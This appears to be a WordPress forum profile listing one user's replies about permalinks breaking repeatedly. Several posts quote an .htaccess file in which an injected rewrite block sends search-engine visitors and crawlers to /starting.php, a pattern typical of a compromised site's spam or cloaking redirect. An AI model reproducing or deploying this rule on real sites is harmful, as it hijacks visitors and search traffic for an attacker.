NathanNeighbour
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.Sad news… broken again.
All plugins disabled. The .htaccess was wiped clean. However, this morning it once again reads:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule># END WordPress
Forum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.did it AGAIN! this time the .htaccess says this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
</IfModule>Forum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.ok… did all that…
after I re-saved the permalinks, the .htaccess file now reads:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule># END WordPress
Plugins:
Askiet
Anti-Malware by ELI (Get Off Malicious Scripts)
Elegant Themes Uploader
Facebook Like
Jetpack
Page Links To
Post Types Order
Wordpress SEO
Social Media Icons Widget
Visual Form Builder ProForum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.OK… so frustrating. I’ve tried everything and it’s still happening. Updated everything. Disabled all the plugins, and deleted my .htaccess file. It is now back to this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule># END WordPress
Anything else I can try? I seems do be good for a few hours and then go down.
Forum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.it is set to post name. not sure what the rest of it is… can I delete it?
Forum: Fixing WordPress
In reply to: Permalinks keep breaking every few hours.It says this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule># END WordPress
Forum: Fixing WordPress
In reply to: Facebook SPAM HELP!